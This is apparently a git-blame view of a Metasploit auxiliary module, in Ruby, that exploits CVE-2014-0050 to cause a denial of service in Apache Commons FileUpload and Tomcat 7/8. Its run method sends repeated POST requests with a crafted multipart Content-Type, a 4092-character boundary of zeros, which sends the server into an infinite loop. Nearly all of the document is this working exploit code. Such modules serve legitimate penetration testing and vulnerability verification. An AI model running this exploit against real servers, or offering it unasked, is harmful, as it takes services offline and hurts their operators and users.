2014-02-22 13:56:59 +00:00
|
|
|
##
|
2014-10-17 16:47:33 +00:00
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
2014-02-22 13:56:59 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
2016-03-08 13:02:44 +00:00
|
|
|
class MetasploitModule < Msf::Auxiliary
|
2014-02-22 13:56:59 +00:00
|
|
|
|
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
include Msf::Auxiliary::Dos
|
|
|
|
|
|
|
|
def initialize(info = {})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => 'Apache Commons FileUpload and Apache Tomcat DoS',
|
|
|
|
'Description' => %q{
|
2014-02-26 14:52:51 +00:00
|
|
|
This module triggers an infinite loop in Apache Commons FileUpload 1.0
|
|
|
|
through 1.3 via a specially crafted Content-Type header.
|
|
|
|
Apache Tomcat 7 and Apache Tomcat 8 use a copy of FileUpload to handle
|
|
|
|
mime-multipart requests, therefore, Apache Tomcat 7.0.0 through 7.0.50
|
|
|
|
and 8.0.0-RC1 through 8.0.1 are affected by this issue. Tomcat 6 also
|
|
|
|
uses Commons FileUpload as part of the Manager application.
|
2014-02-22 13:56:59 +00:00
|
|
|
},
|
|
|
|
'Author' =>
|
|
|
|
[
|
2014-02-26 14:52:51 +00:00
|
|
|
'Unknown', # This issue was reported to the Apache Software Foundation and accidentally made public.
|
2014-02-22 13:56:59 +00:00
|
|
|
'ribeirux' # metasploit module
|
|
|
|
],
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
['CVE', '2014-0050'],
|
|
|
|
['URL', 'http://tomcat.apache.org/security-8.html'],
|
2014-02-26 14:52:51 +00:00
|
|
|
['URL', 'http://tomcat.apache.org/security-7.html']
|
2014-02-22 13:56:59 +00:00
|
|
|
],
|
|
|
|
'DisclosureDate' => 'Feb 6 2014'
|
|
|
|
))
|
|
|
|
|
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
Opt::RPORT(8080),
|
2014-02-24 21:20:34 +00:00
|
|
|
OptString.new('TARGETURI', [ true, "The request URI", '/']),
|
2014-02-22 13:56:59 +00:00
|
|
|
OptInt.new('RLIMIT', [ true, "Number of requests to send",50])
|
|
|
|
], self.class)
|
|
|
|
end
|
|
|
|
|
|
|
|
def run
|
|
|
|
boundary = "0"*4092
|
|
|
|
opts = {
|
|
|
|
'method' => "POST",
|
2014-02-24 21:20:34 +00:00
|
|
|
'uri' => normalize_uri(target_uri.to_s),
|
2014-02-22 13:56:59 +00:00
|
|
|
'ctype' => "multipart/form-data; boundary=#{boundary}",
|
|
|
|
'data' => "#{boundary}00000",
|
|
|
|
'headers' => {
|
|
|
|
'Accept' => '*/*'
|
|
|
|
}
|
|
|
|
}
|
|
|
|
|
2014-03-03 20:12:22 +00:00
|
|
|
# XXX: There is rarely, if ever, a need for a 'for' loop in Ruby
|
2015-04-03 11:12:23 +00:00
|
|
|
# This should be rewritten with 1.upto() or Enumerable#each or
|
|
|
|
# something
|
2014-02-22 13:56:59 +00:00
|
|
|
for x in 1..datastore['RLIMIT']
|
2014-02-26 14:52:51 +00:00
|
|
|
print_status("Sending request #{x} to #{peer}")
|
2014-02-22 13:56:59 +00:00
|
|
|
begin
|
|
|
|
c = connect
|
|
|
|
r = c.request_cgi(opts)
|
|
|
|
c.send_request(r)
|
|
|
|
# Don't wait for a response
|
|
|
|
rescue ::Rex::ConnectionError => exception
|
2016-02-01 22:06:34 +00:00
|
|
|
print_error("Unable to connect: '#{exception.message}'")
|
2014-02-22 13:56:59 +00:00
|
|
|
return
|
|
|
|
ensure
|
|
|
|
disconnect(c) if c
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|